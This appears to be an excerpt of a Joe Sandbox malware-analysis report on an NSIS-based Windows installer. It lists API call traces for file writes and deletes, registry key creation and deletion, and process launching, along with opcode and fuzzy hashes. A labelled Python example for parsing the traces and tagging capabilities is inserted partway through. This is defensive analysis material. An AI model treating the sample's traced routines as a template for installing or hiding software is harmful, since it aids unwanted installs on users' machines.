                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8
                                                          • API String ID: 1453599865-4194326291
                                                          • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
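The per-function "APIs" lists above (one line per call: `Api.MODULE(args), ref: address`, optionally prefixed with `Part of subcall function XXXXXXXX:`) are the most useful part of this report for triage, since they show the file write-then-delete routine at 00402809..004028A3 and the registry key enumeration/deletion routine at 00402B9B..00402C23. The following is an added example, not Joe Sandbox code and not part of the original report: a small Python parser for that line format, fed with lines copied from the two functions just mentioned (plus one argument-less call and one subcall line to cover those variants), with a hypothetical set of capability rules that flag API combinations worth a second look. The rule names and the tagging scheme are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample input: API-call lines copied from two functions listed in
# this report (the file write/delete routine around 0x402809 and the registry
# key deletion routine around 0x402B9B), plus one argument-less call and one
# "Part of subcall function" line to exercise those two variants of the format.
SAMPLE_API_LINES = """
• GlobalAlloc.KERNEL32(?,?), ref: 00402809
• CloseHandle.KERNEL32(?), ref: 0040288F
• GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
• GlobalFree.KERNEL32(?), ref: 0040285E
• WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
• GlobalFree.KERNEL32(00000000), ref: 00402877
• DeleteFileW.KERNEL32(?), ref: 004028A3
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
• RegCloseKey.ADVAPI32(?), ref: 00402BE0
• RegCloseKey.ADVAPI32(?), ref: 00402C05
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
• GetTickCount.KERNEL32 ref: 00402D53
  • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
"""

# One report line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# then Api.MODULE, optional "(args)", then "ref: XXXXXXXX".
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Hypothetical triage rules (an assumption for this example, not taken from the
# report): a tag applies when every API in the set appears in the parsed calls.
CAPABILITY_RULES = {
    "creates_file": {"CreateFileW"},
    "writes_then_deletes_file": {"WriteFile", "DeleteFileW"},
    "deletes_registry_keys": {"RegOpenKeyExW", "RegDeleteKeyW"},
}


def parse_api_lines(text):
    """Parse report API lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            # "?" marks an argument the sandbox could not resolve.
            "args": args.split(",") if args is not None else [],
            "ref": int(m.group("ref"), 16),
            "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def summarize(calls):
    """Count calls per module and apply CAPABILITY_RULES to the API set."""
    apis = {c["api"] for c in calls}
    by_module = defaultdict(int)
    for c in calls:
        by_module[c["module"]] += 1
    tags = sorted(tag for tag, needed in CAPABILITY_RULES.items() if needed <= apis)
    return {"api_count": len(calls), "by_module": dict(by_module), "tags": tags}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for c in parsed:
        print(f"{c['ref']:08X} {c['module']}!{c['api']} args={len(c['args'])}")
    print(summarize(parsed))
```

Pasting a whole "APIs" section from the report into `SAMPLE_API_LINES` works as-is; the subcall prefix is kept as `subcall_of` so that calls made by a callee (here the CreateFileW inside 00405BB4) can be separated from the function's own calls when building a per-function summary.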
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,75572EE0,004057F0,?,00436800,75572EE0,00434000), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,?), ref: 00401630
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3751793516-0
                                                          • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                          • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
